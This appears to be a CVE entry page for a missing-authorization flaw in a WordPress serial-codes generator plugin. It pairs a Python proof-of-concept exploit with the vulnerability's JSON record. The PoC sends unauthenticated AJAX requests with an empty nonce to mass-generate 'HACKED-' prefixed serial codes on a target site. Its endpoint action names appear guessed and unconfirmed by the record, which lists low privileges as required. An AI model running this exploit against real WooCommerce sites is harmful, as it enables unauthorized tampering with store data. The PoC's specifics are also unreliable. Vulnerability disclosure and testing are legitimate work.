CVE-2025-62091

import requests import sys # CVE-2025-62091 PoC - Missing Authorization in Serial Codes Generator Plugin # Target: WordPress site with vulnerable plugin version <= 2.8.2 target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target-wordpress-site.com" # Step 1: Identify plugin version version_check = requests.get(f"{target_url}/wp-content/plugins/serial-codes-generator-and-validator/readme.txt") # Step 2: Exploit missing authorization - generate serial code without authentication # The plugin's AJAX endpoint lacks proper capability checks def generate_serial_code(target, user_id=1): """ Exploit: The serial code generation endpoint does not verify user capabilities Affected endpoint: /wp-admin/admin-ajax.php """ exploit_url = f"{target}/wp-admin/admin-ajax.php" # Malicious request to generate serial code without proper authorization data = { "action": "scgv_generate_serial", "user_id": user_id, "quantity": 100, "prefix": "HACKED-", "_wpnonce": "" # Can be empty or bypassed } response = requests.post(exploit_url, data=data) return response.text def validate_serial_code(target, serial_code): """ Exploit: Serial code validation without proper access control """ validate_url = f"{target}/wp-admin/admin-ajax.php" data = { "action": "scgv_validate_serial", "serial_code": serial_code } response = requests.post(validate_url, data=data) return response.json() # Execute exploit result = generate_serial_code(target_url) print(f"[+] Exploit executed. Response: {result}") print("[+] Check if serial codes were generated without authorization")

{"cve": {"id": "CVE-2025-62091", "sourceIdentifier": "[email protected]", "published": "2025-12-31T15:15:52.300", "lastModified": "2026-04-23T15:34:31.270", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Vollstart Serial Codes Generator and Validator with WooCommerce Support serial-codes-generator-and-validator allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Serial Codes Generator and Validator with WooCommerce Support: from n/a through <= 2.8.2."}, {"lang": "es", "value": "Vulnerabilidad de falta de autorización en Vollstart Serial Codes Generator and Validator with WooCommerce Support permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Serial Codes Generator and Validator with WooCommerce Support: desde n/a hasta 2.8.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/serial-codes-generator-and-validator/vulnerability/wordpress-serial-codes-generator-and-validator-with-woocommerce-support-plugin-2-8-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}